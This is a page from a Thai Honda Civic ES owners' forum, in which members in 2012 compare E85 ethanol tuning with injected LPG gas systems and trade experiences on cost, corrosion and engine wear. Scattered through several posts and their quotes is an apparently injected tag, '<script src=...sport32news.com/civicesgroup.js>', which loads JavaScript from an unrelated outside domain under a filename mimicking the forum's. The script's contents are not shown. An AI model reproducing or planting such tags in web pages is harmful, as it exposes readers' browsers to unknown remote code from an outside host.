ตอบ
benzd


ชื่อเล่น: เบนซ์

เข้าร่วม: 11 มกรา 2009
ตอบ: 3402

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3986
ให้คำขอบคุณ: 3164

ที่อยู่: เกตุม-มหาชัย-สมุทรสาคร
ปี: 2005
สี: ทอง แซทเทิลไลท์ (NH-663M)
พฤหัส, 23 สิงหา 2012 18:55 - เปรียบมวยให้หน่อยครับ ระหว่าง มุมแดง จูนE85 ปะทะ LPG หัวฉีด มุมน้ำเงิน
LPG คลิปตามลายเซ็นครับ
Tanadath


เข้าร่วม: 12 มีนา 2011
ตอบ: 1498

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1165
ให้คำขอบคุณ: 325

ที่อยู่: 240/29ม.2ต.หนองบัวอ.เมืองจ.อุดรธานี
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 23 สิงหา 2012 19:12 - เปรียบมวยให้หน่อยครับ ระหว่าง มุมแดง จูนE85 ปะทะ LPG หัวฉีด มุมน้ำเงิน
คงจะใช้ทั้ง E85 และแก็สคงไม่ได้เพราะน้ำมันตัวนี้ค้างถังนานๆไม่ดี ส่วนมากถ้าใช้แก็สจะใช้ 91 เพราะค้างในถังได้นานไม่เกิดปัญหา อย่าคิดมากครับถ้าใช้รถเกินวันละ 80-100 กม. ติดแก็สประหยัดกว่า ผมใช้มาแสนกว่าแล้วยังปกติครับ "<script src="https://sport32news.com/civicesgroup.js">
teparak20


ชื่อเล่น: เทพ

เข้าร่วม: 06 ตุลา 2008
ตอบ: 35

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 40
ให้คำขอบคุณ: 7

ที่อยู่: อ.นครชัยศรี จ.นครปฐม
ปี: 2001
สี: ทอง เดเสิร์ท มิสท์ (เมทัลลิก) (YP-538M)
พฤหัส, 23 สิงหา 2012 19:13 - เปรียบมวยให้หน่อยครับ ระหว่าง มุมแดง จูนE85 ปะทะ LPG หัวฉีด มุมน้ำเงิน
ผมคบ LPG 5ปี หัวฉีด ไม่เคยมีปัญหา แรงไม่มีตก ตอนนี้วิ่งจะสามแสนแล้วครับ
taeducier


ชื่อเล่น: เต้นะ

เข้าร่วม: 19 มกรา 2010
ตอบ: 1659

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2492
ให้คำขอบคุณ: 248

ที่อยู่: รังสิต-ปทุม
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 23 สิงหา 2012 19:35 - เปรียบมวยให้หน่อยครับ ระหว่าง มุมแดง จูนE85 ปะทะ LPG หัวฉีด มุมน้ำเงิน
LPG ผมติดมา 4 ปีละ... สายท่อยาง+ระบบวัดระดับแก๊ซ มีเสื่อมบ้าง...แต่แค่นี้ปัญาเล็กน้อยครับ
josho


เข้าร่วม: 25 มิถุนา 2012
ตอบ: 813

Guru ES
Guru ES

ได้รับคำขอบคุณ: 397
ให้คำขอบคุณ: 0

ที่อยู่: ปทุมธานี
ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
ศุกร์, 24 สิงหา 2012 10:22 - เปรียบมวยให้หน่อยครับ ระหว่าง มุมแดง จูนE85 ปะทะ LPG หัวฉีด มุมน้ำเงิน
focusyo พิมพ์ว่า:
ติดตั้ง LPG
แล้วจูน E85 ด้วยครับ



2 อย่างเลยเพ่
PN833


เข้าร่วม: 25 กันยา 2012
ตอบ: 99

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 6
ให้คำขอบคุณ: 0
อังคาร, 25 กันยา 2012 15:17 - เปรียบมวยให้หน่อยครับ ระหว่าง มุมแดง จูนE85 ปะทะ LPG หัวฉีด มุมน้ำเงิน
yorkydog พิมพ์ว่า:
ขอบคุณสำหรับทุกๆคำแนะนำคร๊าบ แต่ยังเลือกและตัดสินใจไม่ได้เลย "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">


สวัสดีครับ ผมแนะนำอย่างนี้แล้วกัน

"ได้อ่านกระทู้จากเวปผู้ใช้รถต่างๆ เกือบจะทั้งหมดก็จะมีคนที่อยากใช้พลังงานทางที่ตอนนี้
กำลังเป็นกระแส คือ E85 กับ แก๊ส(ทั้ง LPG, NGV)

ผมเองก็ใช้มาแล้วทั้ง LPG และ E85
ไม่ว่าจะเลือกตัวไหนเราก็ต้องทำใจยอมรับผลข้างเคียงของทั้งสองตัวให้ได้ก่อนที่จะใช้มัน
คือ

LPG ต้องรับให้ได้กับการ ดัดแปลงด้วยการเจาะเครื่องเพื่อติดหัวฉีด เจาะรถเพื่อติดตั้งถัง
ตัดต่อสายไฟเพื่อตัดระบบมาใช้ ECU ของแก๊สเวลาตัดมาที่ระบบแก๊ส
เครื่องทำงานที่ความร้อนสูง( LPG ประมาณ 400 องศา)
เจอช่างเก่งก็แฮ๊บปี้ เจอไม่เก่งก็คงต้องช้ำใจ
ทั้งที่จ่าย 2 หมื่นกว่าถึง 3 หมื่นกว่า
ต้องไปแจ้งขนส่ง เป็นประวัติติดไปตลอด
ถ้าเป็นถังโดนัท ยางอะไหล่ก็หายไป
วาล์วยันเมื่อใช้ไปนานๆ
แต่ก็ประหยัดมาก ตกโลละบาท
ปั๊มเยอะ ไปไหนก็มี แถมเปิด 24 ชม

ส่วน E85 ต้องรับให้ได้คือ ท่อ+ชิ้นส่วนของทางเดินน้ำมันอาจจะถูกกัดกร่อน เพียงแต่ไม่ใช่เร็วๆนี้
แต่อาจจะ 3-5 ปีไปแล้ว แต่ค่าซ่อมบำรุง+เปลี่ยนไม่สูง
ปั๊มยังมีน้อย แต่ปีนี้ก็เพิ่มมาพอสมควรเลย วางแผนดีๆ ก็ผ่านไปเติมได้
ไม่ได้ดัดแปลงเครื่อง ไม่ได้ยุ่งกับระบบไฟของรถ แต่ก็ต้องพ่วงที่หัวฉีดน้ำมัน
กินเชื้อเพลิงเพิ่มขึ้น เข็มตกไวใจหายแว๊บ แต่พอมากดเครื่องคิดเลขก็โล่งหน่อยที่มันยังถูกกว่าเติม E10
ตกโลละบาทกว่า แพงกว่าแก๊ส แต่ลงทุน 6-8 พัน ก็พอจะเก็บคืนได้ไม่นาน

ตามความคิดผมก็ประมาณนี้
แต่เทียบกัน E85 ถ้าคุณยอมรับเรื่องท่อทางเดินน้ำมันได้แล้ว
ก็เอารถไปลองเติมเพียวๆ ซัก 300 บาท ลองวิ่งดู ถ้ากำลังเครื่องไม่ตก ไฟเครื่องไม่โชว์
ก็แปลว่า ECU ของรถคุณสามารถปรับตาม %ethanol ได้ ก็ไม่ต้องไปเสียเงินติดชุดคิท
ถ้าเป็นแก๊สคุณไม่มีโอกาสลอง ต้องตัดสินใจเลยว่าจะติดหรือไม่ติด

ฉะนั้นจะเอารถไปลองพลังงานทางเลือกตัวไหน ผมขอแนะนำ E85 ก่อน
ถ้าลองแล้ว work โดยไม่ต้องติดชุดคิทก็ประหยัดเงินค่าอุปกรณ์ ถ้าต้องติดก็ลงทุนไม่สูง
ถ้าไม่ชอบใจ E85 ค่อยไปเสียเงินติดแก๊สก็ยังไม่สายครับ"
ได้รับคำขอบคุณจาก: sakpu  SimonBKK  padonzzz  wighwaytak  Blackhole  Sak_es5442 
rta050


เข้าร่วม: 24 เมษา 2009
ตอบ: 481

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 715
ให้คำขอบคุณ: 202

ปี: 2001
สี: น้ำเงิน วิวิด (มุก) (B-502P)
อังคาร, 25 กันยา 2012 15:19 - เปรียบมวยให้หน่อยครับ ระหว่าง มุมแดง จูนE85 ปะทะ LPG หัวฉีด มุมน้ำเงิน
เชียร์ lpg 1เสียง ติดมาสามหมื่นไม่กี่เดือนคุ้มทุน
Moo Uan


เข้าร่วม: 07 สิงหา 2009
ตอบ: 1126

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 426
ให้คำขอบคุณ: 126

ที่อยู่: ซ.นวมินทร์93 ถ.นวมินทร์ กทม.
ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
อังคาร, 25 กันยา 2012 15:45 - เปรียบมวยให้หน่อยครับ ระหว่าง มุมแดง จูนE85 ปะทะ LPG หัวฉีด มุมน้ำเงิน
PN833 พิมพ์ว่า:

yorkydog พิมพ์ว่า:
ขอบคุณสำหรับทุกๆคำแนะนำคร๊าบ แต่ยังเลือกและตัดสินใจไม่ได้เลย "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">


สวัสดีครับ ผมแนะนำอย่างนี้แล้วกัน

"ได้อ่านกระทู้จากเวปผู้ใช้รถต่างๆ เกือบจะทั้งหมดก็จะมีคนที่อยากใช้พลังงานทางที่ตอนนี้
กำลังเป็นกระแส คือ E85 กับ แก๊ส(ทั้ง LPG, NGV)

ผมเองก็ใช้มาแล้วทั้ง LPG และ E85
ไม่ว่าจะเลือกตัวไหนเราก็ต้องทำใจยอมรับผลข้างเคียงของทั้งสองตัวให้ได้ก่อนที่จะใช้มัน
คือ

LPG ต้องรับให้ได้กับการ ดัดแปลงด้วยการเจาะเครื่องเพื่อติดหัวฉีด เจาะรถเพื่อติดตั้งถัง
ตัดต่อสายไฟเพื่อตัดระบบมาใช้ ECU ของแก๊สเวลาตัดมาที่ระบบแก๊ส
เครื่องทำงานที่ความร้อนสูง( LPG ประมาณ 400 องศา)
เจอช่างเก่งก็แฮ๊บปี้ เจอไม่เก่งก็คงต้องช้ำใจ
ทั้งที่จ่าย 2 หมื่นกว่าถึง 3 หมื่นกว่า
ต้องไปแจ้งขนส่ง เป็นประวัติติดไปตลอด
ถ้าเป็นถังโดนัท ยางอะไหล่ก็หายไป
วาล์วยันเมื่อใช้ไปนานๆ
แต่ก็ประหยัดมาก ตกโลละบาท
ปั๊มเยอะ ไปไหนก็มี แถมเปิด 24 ชม

ส่วน E85 ต้องรับให้ได้คือ ท่อ+ชิ้นส่วนของทางเดินน้ำมันอาจจะถูกกัดกร่อน เพียงแต่ไม่ใช่เร็วๆนี้
แต่อาจจะ 3-5 ปีไปแล้ว แต่ค่าซ่อมบำรุง+เปลี่ยนไม่สูง
ปั๊มยังมีน้อย แต่ปีนี้ก็เพิ่มมาพอสมควรเลย วางแผนดีๆ ก็ผ่านไปเติมได้
ไม่ได้ดัดแปลงเครื่อง ไม่ได้ยุ่งกับระบบไฟของรถ แต่ก็ต้องพ่วงที่หัวฉีดน้ำมัน
กินเชื้อเพลิงเพิ่มขึ้น เข็มตกไวใจหายแว๊บ แต่พอมากดเครื่องคิดเลขก็โล่งหน่อยที่มันยังถูกกว่าเติม E10
ตกโลละบาทกว่า แพงกว่าแก๊ส แต่ลงทุน 6-8 พัน ก็พอจะเก็บคืนได้ไม่นาน

ตามความคิดผมก็ประมาณนี้
แต่เทียบกัน E85 ถ้าคุณยอมรับเรื่องท่อทางเดินน้ำมันได้แล้ว
ก็เอารถไปลองเติมเพียวๆ ซัก 300 บาท ลองวิ่งดู ถ้ากำลังเครื่องไม่ตก ไฟเครื่องไม่โชว์
ก็แปลว่า ECU ของรถคุณสามารถปรับตาม %ethanol ได้ ก็ไม่ต้องไปเสียเงินติดชุดคิท
ถ้าเป็นแก๊สคุณไม่มีโอกาสลอง ต้องตัดสินใจเลยว่าจะติดหรือไม่ติด

ฉะนั้นจะเอารถไปลองพลังงานทางเลือกตัวไหน ผมขอแนะนำ E85 ก่อน
ถ้าลองแล้ว work โดยไม่ต้องติดชุดคิทก็ประหยัดเงินค่าอุปกรณ์ ถ้าต้องติดก็ลงทุนไม่สูง
ถ้าไม่ชอบใจ E85 ค่อยไปเสียเงินติดแก๊สก็ยังไม่สายครับ"



อืม น่าคิดครับ แต่ผมไม่ทันแล้ว เพราะติดแก็สมาเกือบ3ปีและ แต่ก็มีลองเติมE85 บ้างมาถังสองถัง ไม่มีไฟโชว์ กำลังเครื่องไม่ค่อยแตกกว่าแก็สนะ ว่าจะลองใช้มากขึ้นนะ รถใช้มาตอนนี้ก็2.5แสนแล้ว ES 05
ได้รับคำขอบคุณจาก: sakpu 
cc1


เข้าร่วม: 23 เมษา 2012
ตอบ: 49

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 17
ให้คำขอบคุณ: 0
อังคาร, 25 ธันวา 2012 22:57 - เปรียบมวยให้หน่อยครับ ระหว่าง มุมแดง จูนE85 ปะทะ LPG หัวฉีด มุมน้ำเงิน
civic es 02 exi เดิมๆ ติด lpg แล้วก็เติม e85 ด้วย
wutdy


ชื่อเล่น: วูดดี้

เข้าร่วม: 13 มกรา 2010
ตอบ: 895

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1250
ให้คำขอบคุณ: 235

ปี: 2001
อังคาร, 25 ธันวา 2012 23:03 - เปรียบมวยให้หน่อยครับ ระหว่าง มุมแดง จูนE85 ปะทะ LPG หัวฉีด มุมน้ำเงิน
รถเราไม่ได้ออกมาเพื่อรองรับ E85 ครับ ถึงจูน + เปลื่ยนท่อยางทั้งหมดใหม่ เครื่องก็จะทนสถาพแอลกอฮอล์สูงขนาดนั้นไม่ดีแน่ๆครับ ถ้าจะเล่น E85 ต้องเปลื่ยนเยอะมาก แถมกินน้ำมันกว่าเดิมเกือบ 50% เลยครับ

ถ้าใช้แก็สเครื่องก็จะโทรมเร็วกว่าปกติแน่นอน แต่ถ้ารู้จักการใช้อย่างถูกต้อง และติดของที่มีคุณภาพแล้วอยู่ได้นานครับ ผมเชียร์แก็ส
Peter


เข้าร่วม: 03 กันยา 2011
ตอบ: 657

Guru ES
Guru ES

ได้รับคำขอบคุณ: 344
ให้คำขอบคุณ: 17

ที่อยู่: N_k_e_S_a_r_a_b_u_R_I
ปี: 2001
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อังคาร, 25 ธันวา 2012 23:22 - เปรียบมวยให้หน่อยครับ ระหว่าง มุมแดง จูนE85 ปะทะ LPG หัวฉีด มุมน้ำเงิน
เชียร์ E85 รถผมไม่ได้ทำอะไรเพิ่มซัดเพียวตาม kh.Sanyaa มาตั้งแต่ มี.ค 55 สตาร์ทตอนเช้าลากยาว 2 เท่า(เครื่องเย็น) Octane 105 ถ้าเครื่องร้อนเอาไม่อยู่ ผมเคยอัดได้ถึง 170 ยังไมหมด พลาดมาไม่คุ้ม
basic00


ชื่อเล่น: บอย

เข้าร่วม: 11 กันยา 2012
ตอบ: 345

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 380
ให้คำขอบคุณ: 130

ที่อยู่: ปทุมธานี
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 26 ธันวา 2012 00:30 - เปรียบมวยให้หน่อยครับ ระหว่าง มุมแดง จูนE85 ปะทะ LPG หัวฉีด มุมน้ำเงิน
เชียร์ E85 ครับใช้อยู่ เดิมๆไม่ติดตั้งอะไรเพิ่มเติม มีปัญหาเรื่องเดียว สตาร์ทตอนเช้าถ้าอากาศเย็นๆ สตาร์ท 2 ครั้งไม่ลาก
กินน้ำมันมากกว่าเดิม 15%
แต่ด้วยราคาแบบนี้ก็ไม่มีปัญหาครับรับได้
Nine_Eleven


ชื่อเล่น: นิ

เข้าร่วม: 28 ตุลา 2008
ตอบ: 1121

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 635
ให้คำขอบคุณ: 1154

ที่อยู่: หนามแดง
ปี: 2004
สี: ขาว ทาฟเฟต้า (NH-578)
พุธ, 26 ธันวา 2012 08:12 - เปรียบมวยให้หน่อยครับ ระหว่าง มุมแดง จูนE85 ปะทะ LPG หัวฉีด มุมน้ำเงิน
wutdy พิมพ์ว่า:
รถเราไม่ได้ออกมาเพื่อรองรับ E85 ครับ ถึงจูน + เปลื่ยนท่อยางทั้งหมดใหม่ เครื่องก็จะทนสถาพแอลกอฮอล์สูงขนาดนั้นไม่ดีแน่ๆครับ ถ้าจะเล่น E85 ต้องเปลื่ยนเยอะมาก แถมกินน้ำมันกว่าเดิมเกือบ 50% เลยครับ

ถ้าใช้แก็สเครื่องก็จะโทรมเร็วกว่าปกติแน่นอน แต่ถ้ารู้จักการใช้อย่างถูกต้อง และติดของที่มีคุณภาพแล้วอยู่ได้นานครับ ผมเชียร์แก็ส


+1 ครับ
SimonBKK


เข้าร่วม: 27 มีนา 2012
ตอบ: 991

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 778
ให้คำขอบคุณ: 570

ที่อยู่: ภูเก็ต
พุธ, 26 ธันวา 2012 15:49 - เปรียบมวยให้หน่อยครับ ระหว่าง มุมแดง จูนE85 ปะทะ LPG หัวฉีด มุมน้ำเงิน
E85 แน่นอนกว่าทั้งในด้านการสึกหรอที่น้อยกว่าและแรงม้าที่ได้มากกว่า จะมีข้อเสียเปรียบด้านราคานิดหน่อยแต่คุ้มค่าระยะยาวเพราะพื้นฐานต่อไปคือน้ำน้ำมัน E85 ซึ่งกำลังขยายตัวเพิ่มมากขึ้นโดยเฉพาะปี2556 จะเกิดปั๊มE85 อย่างทั่วถึงจากการเปลี่ยนหัวจ่ายเบนซิน91เป็นหัวจ่ายE85 ที่สำคัญแทบไม่ต้องปรับเปลี่ยนอะไรมากกับเครื่องยนต์และระบบน้ำมัน เมื่อก่อนผมก็ใช้LPGระบบหัวฉีด ตอนนี้ถอดออกแล้วครับหนักรถ กินE85เพียวๆมาปีนึงแล้วไม่มีปัญหาอะไรเลย ทั้งนี้ทั้งนั้นไตร่ตรองเอาเองนะครับนี่เป็นข้อเท็จจริงที่ผมใช้เองครับ
ส่วนความเห็นท่านอื่นๆติดตามที่นี่เลยครับ
http://www.civicesgroup.com/forum/topic39293
ได้รับคำขอบคุณจาก: sakpu 
tsrnty


ชื่อเล่น: อ๊อด

เข้าร่วม: 05 ตุลา 2011
ตอบ: 178

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 131
ให้คำขอบคุณ: 45

ที่อยู่: ครองเปรม,บัวทองธานี
ปี: 2001
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พฤหัส, 27 ธันวา 2012 01:28 - เปรียบมวยให้หน่อยครับ ระหว่าง มุมแดง จูนE85 ปะทะ LPG หัวฉีด มุมน้ำเงิน
เเก๊ส ครับ สะดวกเเละประหยัด 
sakpu


ชื่อเล่น: ต๋อง

เข้าร่วม: 23 ตุลา 2012
ตอบ: 155

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 258
ให้คำขอบคุณ: 165

ที่อยู่: ถนนรังสิต-นครนายก 48 (คลอง 2)
ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
พฤหัส, 27 ธันวา 2012 05:30 - เปรียบมวยให้หน่อยครับ ระหว่าง มุมแดง จูนE85 ปะทะ LPG หัวฉีด มุมน้ำเงิน
ผมใช้รถวันหนึ่งประมาณ 110 กม. แบ่งใช้น้ำมัน E85 25% ใช้แก็ส LPG 75% (ติดตั้งปี 50 ยังใช้งานได้ตามปกติ) ช่วยถนอมยืดอายุเครื่องรถยนต์ได้ดี ถ้า LPG ราคาลอยตัวก็จะเพิ่มอัตราการใช้น้ำมันให้สูงขึ้น
tokmun002


ชื่อเล่น: โอ

เข้าร่วม: 11 พฤษภาคม 2012
ตอบ: 1737

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1331
ให้คำขอบคุณ: 1705

ที่อยู่: พระประแดง
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พฤหัส, 27 ธันวา 2012 06:33 - เปรียบมวยให้หน่อยครับ ระหว่าง มุมแดง จูนE85 ปะทะ LPG หัวฉีด มุมน้ำเงิน
SimonBKK พิมพ์ว่า:
E85 แน่นอนกว่าทั้งในด้านการสึกหรอที่น้อยกว่าและแรงม้าที่ได้มากกว่า จะมีข้อเสียเปรียบด้านราคานิดหน่อยแต่คุ้มค่าระยะยาวเพราะพื้นฐานต่อไปคือน้ำน้ำมัน E85 ซึ่งกำลังขยายตัวเพิ่มมากขึ้นโดยเฉพาะปี2556 จะเกิดปั๊มE85 อย่างทั่วถึงจากการเปลี่ยนหัวจ่ายเบนซิน91เป็นหัวจ่ายE85 ที่สำคัญแทบไม่ต้องปรับเปลี่ยนอะไรมากกับเครื่องยนต์และระบบน้ำมัน เมื่อก่อนผมก็ใช้LPGระบบหัวฉีด ตอนนี้ถอดออกแล้วครับหนักรถ กินE85เพียวๆมาปีนึงแล้วไม่มีปัญหาอะไรเลย ทั้งนี้ทั้งนั้นไตร่ตรองเอาเองนะครับนี่เป็นข้อเท็จจริงที่ผมใช้เองครับ
ส่วนความเห็นท่านอื่นๆติดตามที่นี่เลยครับ
http://www.civicesgroup.com/forum/topic39293



+ lpg มันจะเริ่มมีปัญหากับค่าครองชีพพวกเราทุกคนแล้ว. มันควรใช้ในครัวเรือนมากกว่าครับ!
ตอบ
หน้า 2 จาก 2
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2025 Civic ES Group. All rights reserved.